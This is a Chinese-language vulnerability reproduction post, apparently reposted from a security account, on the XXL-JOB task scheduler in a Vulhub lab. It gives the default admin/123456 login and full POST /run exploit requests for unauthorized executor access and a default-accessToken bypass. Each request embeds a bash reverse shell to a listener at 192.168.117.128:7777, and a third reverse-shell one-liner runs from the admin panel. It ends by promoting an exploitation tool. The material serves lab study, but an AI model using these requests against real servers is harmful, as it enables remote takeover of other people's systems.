文章总结： 本文汇总了xxl-job任务调度中心的多个安全漏洞，包括默认凭证admin/123456、未授权访问导致命令执行、后台命令执行功能滥用以及默认accesstoken权限绕过，并提供了使用vulhub搭建环境、BurpSuite发送EXP及Kali监听获取反弹shell的详细复现步骤。 综合评分： 65 文章分类： 漏洞分析,实战经验,解决方案,web安全

【漏洞复现】XXL-JOB任务调度中心漏洞汇总

原创

R R

无痕安全实验室

2026年5月25日 15:37 北京

在小说阅读器读本章

去阅读

本文只做技术研究，请遵守相关法律法规，切勿非法测试，所产生的后果需自行承担，如有侵权，请联系删除。

环境搭建

使用Vulhub进行漏洞环境搭建

进入到对应漏洞文件内部，执行终端命令

docker compose up -ddocker compose ps

xxl-job漏洞环境地址192.168.117.132:8080192.168.117.132:9999kali反弹shell监听地址192.168.117.128:7777

漏洞一：默认口令

访问路径/xxl-job-admin来到后台登录页面

admin/123456

漏洞二：未授权访问反弹shell

漏洞位置存在于默认的9999端口

kali端启动监听

使用burp直接打exp

POST /run HTTP/1.1Host: 192.168.117.132:9999Content-Type: application/jsonContent-Length: 406
{ "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "", "executorBlockStrategy": "COVER_EARLY", "executorTimeout": 0, "logId": 1, "logDateTime": 1745646241, "glueType": "GLUE_SHELL", "glueSource": "bash -c 'bash -i >& /dev/tcp/192.168.117.128/7777 0>&1'", "glueUpdatetime": 1745646241, "broadcastIndex": 0, "broadcastTotal": 0}

kali端接到反弹shell

漏洞三：命令执行反弹shell

使用默认密码admin/123456进入后台

bash&nbsp;-c 'exec bash -i &>/dev/tcp/192.168.117.128/7777&nbsp;<&1'

kali端得到反弹shell

漏洞四：默认accessToken权限绕过反弹shell

kali端开启监听

使用burp直接打exp

POST /run HTTP/1.1Host: 192.168.117.132:9999Content-Type: application/jsonXXL-JOB-ACCESS-TOKEN: default tokenContent-Length: 431
{ "jobId": 1, "executorHandler": "demoJobHandler", "executorParams": "demoJobHandler", "executorBlockStrategy": "SERIAL_EXECUTION", "executorTimeout": 0, "logId": 1, "logDateTime": 1586373637819, "glueType": "GLUE_SHELL", "glueSource": "bash -c 'bash -i >& /dev/tcp/192.168.117.128/7777 0>&1'", "glueUpdatetime": 1586693836766, "broadcastIndex": 0, "broadcastTotal": 0}

综合利用工具

工具获取

关注公众号回复xxl-job综合利用工具

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：无痕安全实验室 R R《【漏洞复现】XXL-JOB任务调度中心漏洞汇总》